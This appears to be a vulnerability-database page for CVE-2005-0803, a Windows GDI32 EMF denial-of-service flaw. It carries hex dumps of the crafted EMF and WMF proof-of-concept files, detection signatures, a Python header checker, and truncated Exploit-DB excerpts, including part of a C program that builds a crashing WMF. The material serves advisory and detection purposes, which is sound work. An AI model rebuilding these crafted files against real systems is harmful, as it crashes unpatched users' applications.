CVE-2005-0803
Published 2005-05-02
Priority P4 · 31 · medium · 5 · CVSS 2.0 · AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS 70.77% (99.3th percentile)
The GetEnhMetaFilePaletteEntries API in GDI32.DLL in Windows 2000 allows remote attackers to cause a denial of service (application crash) via a crafted Enhanced Metafile (EMF) file that causes invalid (1) end, (2) emreof, or (3) palent offsets to be used, aka "Enhanced Metafile Vulnerability."
Detection & IOCs (extracted from sources)
bytes (WMF PoC header):
d7 cd c6 9a 00 00 c6 fb ca 02 aa 02 39 09 e8 03 00 00 00 00 66 a6 01 00 09 00 00 03 ff ff ff 7f 00 00 ff ff ff ff 00 00
bytes (EMF PoC file):
01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00 41 42 43 44 00 00 01 ff
- Crafted EMF file exploits GetEnhMetaFilePaletteEntries in GDI32.DLL via invalid end/emreof/palent offsets; detect malformed EMF files with anomalous palette entry offsets processed by gdi32.dll.
- The crafted EMF file contains the magic bytes '20 45 4d 46' (' EMF') at offset 0x28; combined with the anomalous/truncated record structure (total size 0x78, only 17 records, ending with 00 00 01 ff), this can be used as a signature for the PoC file.
- The WMF PoC file header starts with the magic bytes 'd7 cd c6 9a'; combined with mtNoObjects=0x0000 at byte offset 26-27 of the WMF header, this pattern identifies the malicious WMF.
- The EMF PoC (exploit 25231) targets Windows XP/2000/2003 via the vulnerable gdi32.dll; scope is limited to unpatched systems.
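A defender-side header check for the two signatures in the bullets above, added here as example code (it is not from the page's sources or from Exploit-DB). It assumes the documented ENHMETAHEADER/EMR_EOF and placeable-WMF/METAHEADER layouts; the files it inspects are constructed by its own build_emf/build_wmf helpers rather than taken from the PoC dumps.

```python
import struct

EMF_SIGNATURE = 0x464D4520      # " EMF", little-endian at ENHMETAHEADER offset 0x28
EMR_EOF = 14                    # type of the mandatory trailing EMR_EOF record
WMF_PLACEABLE_KEY = 0x9AC6CDD7  # the d7 cd c6 9a magic of a placeable WMF

def check_emf(data):
    """Return anomalies in an EMF's header and in the palette fields of its EMR_EOF record."""
    if len(data) < 100 or struct.unpack_from("<I", data, 0x28)[0] != EMF_SIGNATURE:
        return ["no ' EMF' signature at offset 0x28"]
    hdr_size, n_bytes = struct.unpack_from("<I", data, 4) + struct.unpack_from("<I", data, 0x30)
    issues = [] if n_bytes == len(data) else [f"nBytes {n_bytes:#x} != file size {len(data):#x}"]
    off = hdr_size                                # walk the (iType, nSize) record chain
    while off + 8 <= len(data):
        r_type, r_size = struct.unpack_from("<II", data, off)
        if r_size < 8 or off + r_size > len(data) or (r_type == EMR_EOF and r_size < 20):
            return issues + [f"record at {off:#x} overruns the file"]
        if r_type == EMR_EOF:
            n_pal, off_pal = struct.unpack_from("<II", data, off + 8)  # offset is record-relative
            if off_pal < 16 or off_pal + 4 * n_pal + 4 > r_size:       # entries + SizeLast must fit
                issues.append(f"EMR_EOF palette offset {off_pal:#x} for {n_pal} entries is out of bounds")
            return issues
        off += r_size
    return issues + ["no EMR_EOF record"]

def check_wmf(data):
    """Flag a WMF whose METAHEADER.mtNoObjects is zero (the MS05-053 PoC pattern)."""
    off = 22 if len(data) >= 4 and struct.unpack_from("<I", data)[0] == WMF_PLACEABLE_KEY else 0
    if len(data) < off + 18:
        return ["truncated WMF header"]
    mt_type, hdr_size, _ver, _size, no_objects = struct.unpack_from("<HHHIH", data, off)
    issues = [] if mt_type in (1, 2) and hdr_size == 9 else ["not a WMF METAHEADER"]
    if no_objects == 0:
        issues.append("mtNoObjects == 0")
    return issues

def build_emf(n_pal, off_pal):
    """Constructed sample: a 100-byte ENHMETAHEADER followed by a single EMR_EOF record."""
    eof = struct.pack("<IIIII", EMR_EOF, 20, n_pal, off_pal, 20)
    hdr = struct.pack("<II", 1, 100) + bytes(32)  # iType, nSize, rclBounds, rclFrame
    hdr += struct.pack("<IIIIHHIIIiiiiIII", EMF_SIGNATURE, 0x10000, 100 + len(eof), 1,
                       0, 0, 0, 0, n_pal, 0, 0, 0, 0, 0, 0, 0)
    return hdr + eof

def build_wmf(no_objects):
    """Constructed sample: 22-byte placeable header plus a METAHEADER with the given mtNoObjects."""
    placeable = struct.pack("<IHhhhhHIH", WMF_PLACEABLE_KEY, 0, 0, 0, 100, 100, 1000, 0, 0)
    return placeable + struct.pack("<HHHIHIH", 1, 9, 0x300, 9, no_objects, 0, 0)
```

check_emf flags an EMR_EOF whose offPalEntries/nPalEntries fall outside the record, the condition the CVE text calls an invalid palent offset; check_wmf flags the mtNoObjects == 0 pattern from the MS05-053 PoC.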
No detection rules found.
Exploit-DB
CVE-2005-2124 Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
exploitdb · 2005-11-30
---
```c
/*
 * Author: Winny Thomas
 * Pune, INDIA
 *
 * The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
 * when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
 * The code was tested on Windows 2000 server SP4. The issue does not occur with the
 * hotfix for GDI (MS05-053) installed.
 *
 * Disclaimer: This code is for educational/testing purposes by authorized persons on
 * networks/systems setup for such a purpose. The author of this code shall not bear
 * any responsibility for any damage caused by using this code.
 *
 */
#include <stdio.h>

unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mt
```
Exploit-DB
CVE-2005-0803 Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
exploitdb · 2005-03-17
---
source: https://www.securityfocus.com/bid/12834/info
Reportedly, a denial of service vulnerability affects Microsoft Windows GDI library 'gdi32.dll'. This issue is due to a failure of the application to securely copy data from malformed EMF image files.
An attacker may leverage this issue to trigger a denial of service condition in software implementing the vulnerable library. Other attacks may also be possible.
A hex-dumped EMF file:
```text
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 0
```
No writeups or analysis indexed.
References
- http://marc.info/?l=bugtraq&m=111108743527497&w=2
- http://secunia.com/advisories/14631
- http://secunia.com/advisories/17223
- http://secunia.com/advisories/17461
- http://securitytracker.com/id?1015168
- http://support.avaya.com/elmodocs2/security/ASA-2005-228.pdf
- http://www.kb.cert.org/vuls/id/134756
- http://www.osvdb.org/20580
- http://www.securityfocus.com/bid/12834
- http://www.us-cert.gov/cas/techalerts/TA05-312A.html
- http://www.vupen.com/english/advisories/2005/2348
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-053
- https://exchange.xforce.ibmcloud.com/vulnerabilities/19727
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1121
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1152
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1215
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1240
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A671